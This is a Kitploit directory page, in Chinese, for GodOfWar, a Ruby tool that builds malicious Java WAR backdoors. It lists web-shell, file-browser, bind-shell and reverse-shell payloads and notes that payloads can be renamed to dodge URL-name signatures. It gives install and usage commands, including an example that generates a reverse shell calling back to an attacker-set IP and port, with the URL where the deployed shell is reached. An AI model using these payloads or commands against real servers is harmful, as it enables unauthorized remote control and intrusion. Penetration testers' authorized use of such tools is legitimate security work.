Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
godofwar — GodOfWar - 内置有效载荷的恶意Java WAR构建器 | Kitploit
工具/GitHubGitHub/kingsabri/godofwar
Payload生成漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubkingsabri/godofwar

godofwar

GodOfWar - 内置有效载荷的恶意Java WAR构建器

查看仓库
1253417年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

GodOfWar - 恶意Java WAR构建器

一个命令行工具,用于生成用于渗透测试/红队行动目的的战(WAR)负载,使用Ruby编写。

root@kitploit:~
                              .
                             hhh              
                            hhhhhhh           
                           hhhhhhhh        
                          hhhhhhhh+        
                         hhhhhhhh'           
                        hhhhhhhh.            
                       hhhhhhhhh             
        ..--          hhhhhhhhh             
      -sh/..  +.     hhhhhhhhh:              
      /+/:-/+ss-`   hhhhhhhhhh:               
      /MMM`ss:``.`  hhhhhhhhhh:              
     .MMMMM:        hhhhhhhhhhhhhhhhh:       
     MMMMMMM:        hhhhhhhhhhhhhhhh:      
     MMMMMMMMMMMMM:  hhhhhhhhhhhhhhhh`       
    :NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`       
   ./:`smdo+oos++-    `++sNMMMMMNmh+         
      .-y-`     ` :.  /   -dmddhhhhh-        
       o/-     `//o/ /M/   `+hhhhhhhh`       
      /o     :yosmy   +y  .`.hhhhhhhho       
      +`     /../.:      `.y::hhhhhs:`       
       `      `+yys`   .sy` /oohhy:          
                `/:s/-``     `.hh`           
               ..`     `       y+            
            .hNNmmNdymmmmds`   :-            
            hs.   ``..    :y-  `             
               -hhmNmddm+   .                
               `NMMMMMMm                     
                ` `oMMy                      
            `.     /Md-      :o  
           MMMMMMMMMMMMMMMMMMM:             
            MMMMMMMMMMMMMMMMMM:              
             MMMMMMMMMMMMMMMMM               
              MMMMMMMMMMMMMMM.               
              `MMMMMMMMMMMMM.                 
                :sNMMMNMdo:                  
                  ``+m:/-                    
                     `                                  
GodOfWar - Malicious Java WAR builder.

特性

  • 现有负载(尝试 -l/--list)
    • cmd_get
    • filebrowser
    • bind_shell
    • reverse_shell
    • reverse_shell_ui
  • 可配置的后门(尝试 --host/--port)
  • 控制负载名
    • 避免部署后使用恶意名称以绕过URL名称签名

安装

root@kitploit:~
$ gem install godofwar

用法

root@kitploit:~
$ godofwar -h 

帮助菜单:
   -p, --payload PAYLOAD            从可用负载中生成war(配合-l/--list使用)
   -H, --host IP_ADDR               所选负载的本地或远程IP地址(配合 -p/--payload使用)
   -P, --port PORT                  所选负载的本地或远程端口(配合 -p/--payload使用)
   -o, --output [FILE]              输出文件及部署名称(默认为负载原始名称,查看‘-l/--list’)
   -l, --list                       列出所有可用负载
   -h, --help                       显示此帮助信息

示例

列出所有负载

root@kitploit:~
$ godofwar -l
├── cmd_get
│   └── Information:
│       ├── Description: Command execution via web interface
│       ├── OS:          any
│       ├── Settings:    {"false"=>"No Settings required!"}
│       ├── Usage:       http://host/cmd.jsp?cmd=whoami
│       ├── References:  ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│   └── Information:
│       ├── Description: Remote file browser, upload, download, unzip files and native command execution
│       ├── OS:          any
│       ├── Settings:    {"false"=>"No Settings required!"}
│       ├── Usage:       http://host/filebrowser.jsp
│       ├── References:  ["http://www.vonloesch.de/filebrowser.html"]
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│   └── Information:
│       ├── Description: TCP bind shell
│       ├── OS:          any
│       ├── Settings:    {"port"=>4444, "false"=>"No Settings required!"}
│       ├── Usage:       http://host/reverse-shell.jsp
│       ├── References:  ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│   └── Information:
│       ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
│       ├── OS:          any
│       ├── Settings:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│       ├── Usage:       http://host/reverse_shell_ui.jsp
│       ├── References:  []
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│   └── Information:
│       ├── Description: TCP reverse shell. LHOST and LPORT are hardcoded
│       ├── OS:          any
│       ├── Settings:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│       ├── Usage:       http://host/reverse_shell.jsp
│       ├── References:  []
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell

生成带有LHOST和LPORT的负载

root@kitploit:~
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy

部署后,你可以访问你的shell于(http://host:8080/puppy/puppy.jsp)

贡献

  1. Fork 它 ( https://github.com/KINGSABRI/godofwar/fork ).
  2. 创建你的特性分支 (git checkout -b my-new-feature).
  3. 提交你的更改 (git commit -am 'Add some feature').
  4. 推送到该分支 (git push origin my-new-feature).
  5. 创建一个新的 Pull Request.

添加更多后门

要贡献更多后门:

  1. 在payloads目录下创建一个新文件夹。
  2. 将你的jsp文件放入新创建的目录(确保目录名与文件名相同)。
  3. 更新 payloads_info.json 文件,包含:
    1. 描述。
    2. 支持的操作系统(尽量使其通用)。
    3. 配置:默认主机和端口。
    4. 参考来源:负载来源或其创建者致谢。

许可证

该gem以开源形式提供,遵循MIT许可条款。

下载工具